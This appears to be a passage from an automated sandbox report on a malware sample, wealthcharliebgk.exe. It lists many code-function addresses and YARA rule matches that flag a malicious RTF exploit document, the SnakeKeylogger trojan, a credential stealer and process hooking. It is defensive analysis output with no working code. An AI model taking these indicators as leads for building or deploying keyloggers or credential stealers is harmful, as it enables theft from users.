                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C17388_2_005C1738
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CFA388_2_005CFA38
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C57398_2_005C5739
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CB7378_2_005CB737
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C2E308_2_005C2E30
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CCF308_2_005CCF30
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C8C318_2_005C8C31
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C6E328_2_005C6E32
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CA4288_2_005CA428
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CFA288_2_005CFA28
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CCF208_2_005CCF20
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C04D88_2_005C04D8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C72D88_2_005C72D8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CC0D88_2_005CC0D8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C44D88_2_005C44D8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C1BD08_2_005C1BD0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C95D08_2_005C95D0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C5BD08_2_005C5BD0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CEBCF8_2_005CEBCF
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C32C88_2_005C32C8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C72C98_2_005C72C9
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CD8C08_2_005CD8C0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C95C08_2_005C95C0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C90FC8_2_005C90FC
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CD3F88_2_005CD3F8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C0DF88_2_005C0DF8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C7BF88_2_005C7BF8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CA8F08_2_005CA8F0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C44E88_2_005C44E8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CD3E88_2_005CD3E8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C5BE08_2_005C5BE0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CEBE08_2_005CEBE0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CA8E08_2_005CA8E0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C29988_2_005C2998
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C9A988_2_005C9A98
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CF0988_2_005CF098
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C699A8_2_005C699A
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CC5908_2_005CC590
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CDD888_2_005CDD88
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C9A898_2_005C9A89
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C49808_2_005C4980
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CB2808_2_005CB280
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C3BB88_2_005C3BB8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CADB88_2_005CADB8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C52B08_2_005C52B0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CD8AF8_2_005CD8AF
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C69A88_2_005C69A8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CF0A88_2_005CF0A8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CADA88_2_005CADA8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C3BAA8_2_005C3BAA
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C12A08_2_005C12A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005CC5A08_2_005CC5A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C82A08_2_005C82A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005C52A18_2_005C52A1
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EA1208_2_005EA120
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005ED6408_2_005ED640
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EA4408_2_005EA440
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E00408_2_005E0040
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EC0608_2_005EC060
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EF2608_2_005EF260
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E00178_2_005E0017
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E30108_2_005E3010
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005ED0008_2_005ED000
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E18288_2_005E1828
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EBA208_2_005EBA20
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EEC208_2_005EEC20
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E34D88_2_005E34D8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EE2C08_2_005EE2C0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EB0C08_2_005EB0C0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E04F88_2_005E04F8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E1CF08_2_005E1CF0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005ECCE08_2_005ECCE0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E0E988_2_005E0E98
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E0E878_2_005E0E87
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EAA808_2_005EAA80
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E26808_2_005E2680
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EDC808_2_005EDC80
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EC6A08_2_005EC6A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EF8A08_2_005EF8A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EA7508_2_005EA750
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E2B488_2_005E2B48
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EBD408_2_005EBD40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EEF408_2_005EEF40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EA7608_2_005EA760
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E13608_2_005E1360
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005ED9608_2_005ED960
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E05088_2_005E0508
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EB7008_2_005EB700
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EE9008_2_005EE900
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005ED3208_2_005ED320
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E09D08_2_005E09D0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EC9C08_2_005EC9C0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EFBC08_2_005EFBC0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E09C18_2_005E09C1
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EE5E08_2_005EE5E0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EB3E08_2_005EB3E0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EC3808_2_005EC380
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EF5808_2_005EF580
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E21B88_2_005E21B8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EADA08_2_005EADA0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005E39A08_2_005E39A0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_005EDFA08_2_005EDFA0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A24A808_2_00A24A80
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A200408_2_00A20040
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A298A28_2_00A298A2
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A27EA08_2_00A27EA0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2F2A88_2_00A2F2A8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A28BA88_2_00A28BA8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A298B08_2_00A298B0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2AEB08_2_00A2AEB0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2BBB88_2_00A2BBB8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A234B98_2_00A234B9
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2D1808_2_00A2D180
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A264808_2_00A26480
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A257888_2_00A25788
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2DE888_2_00A2DE88
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A271888_2_00A27188
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A264908_2_00A26490
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A271988_2_00A27198
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A28B988_2_00A28B98
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A27E9E8_2_00A27E9E
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A25BE08_2_00A25BE0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2E4E08_2_00A2E4E0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A268E88_2_00A268E8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A275F08_2_00A275F0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A28FF08_2_00A28FF0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A282F68_2_00A282F6
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A282F88_2_00A282F8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2AEC08_2_00A2AEC0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A241C08_2_00A241C0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2C8C18_2_00A2C8C1
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A234C88_2_00A234C8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2BBC88_2_00A2BBC8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2C8D08_2_00A2C8D0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A241D08_2_00A241D0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A24ED08_2_00A24ED0
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A25BD48_2_00A25BD4
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A24ED88_2_00A24ED8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2D5D88_2_00A2D5D8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2FBD88_2_00A2FBD8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A268DC8_2_00A268DC
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2C0208_2_00A2C020
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A239208_2_00A23920
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A253208_2_00A25320
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2CD288_2_00A2CD28
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A246288_2_00A24628
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A260288_2_00A26028
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A253308_2_00A25330
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2DA308_2_00A2DA30
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A26D308_2_00A26D30
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2F7318_2_00A2F731
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A260388_2_00A26038
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A290008_2_00A29000
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A29D088_2_00A29D08
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2B3088_2_00A2B308
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A200128_2_00A20012
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2EE108_2_00A2EE10
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A239108_2_00A23910
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2C0108_2_00A2C010
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2B3188_2_00A2B318
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2461C8_2_00A2461C
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2B7608_2_00A2B760
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2AA688_2_00A2AA68
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2C4688_2_00A2C468
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A23D698_2_00A23D69
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2B7708_2_00A2B770
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A230708_2_00A23070
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A24A708_2_00A24A70
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A23D788_2_00A23D78
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2C4788_2_00A2C478
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2E9788_2_00A2E978
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A257788_2_00A25778
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2DE788_2_00A2DE78
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2F7408_2_00A2F740
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A26D408_2_00A26D40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A27A408_2_00A27A40
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A287408_2_00A28740
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A27A488_2_00A27A48
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A294488_2_00A29448
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A287508_2_00A28750
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A294588_2_00A29458
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2AA598_2_00A2AA59
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A2305F8_2_00A2305F
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A557B88_2_00A557B8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A549F88_2_00A549F8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A550D88_2_00A550D8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A53C388_2_00A53C38
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A543188_2_00A54318
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A52E788_2_00A52E78
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A500408_2_00A50040
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A535588_2_00A53558
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A557A88_2_00A557A8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A549E98_2_00A549E9
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A529CE8_2_00A529CE
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A550C88_2_00A550C8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A50ED88_2_00A50ED8
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A521218_2_00A52121
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A53C288_2_00A53C28
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A521308_2_00A52130
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A52B008_2_00A52B00
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A543088_2_00A54308
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A500148_2_00A50014
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A52E688_2_00A52E68
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A5354A8_2_00A5354A
                Source: C:\Users\user\AppData\Roaming\wealthcharliebgk.exeCode function: 8_2_00A52A508_2_00A52A50
                Source: Xkl0PnD8zFPjfh1.wiz.rtf, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.wealthcharliebgk.exe.3670430.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 8.2.wealthcharliebgk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.wealthcharliebgk.exe.362d410.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.wealthcharliebgk.exe.3670430.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.wealthcharliebgk.exe.362d410.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000008.00000002.875616803.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
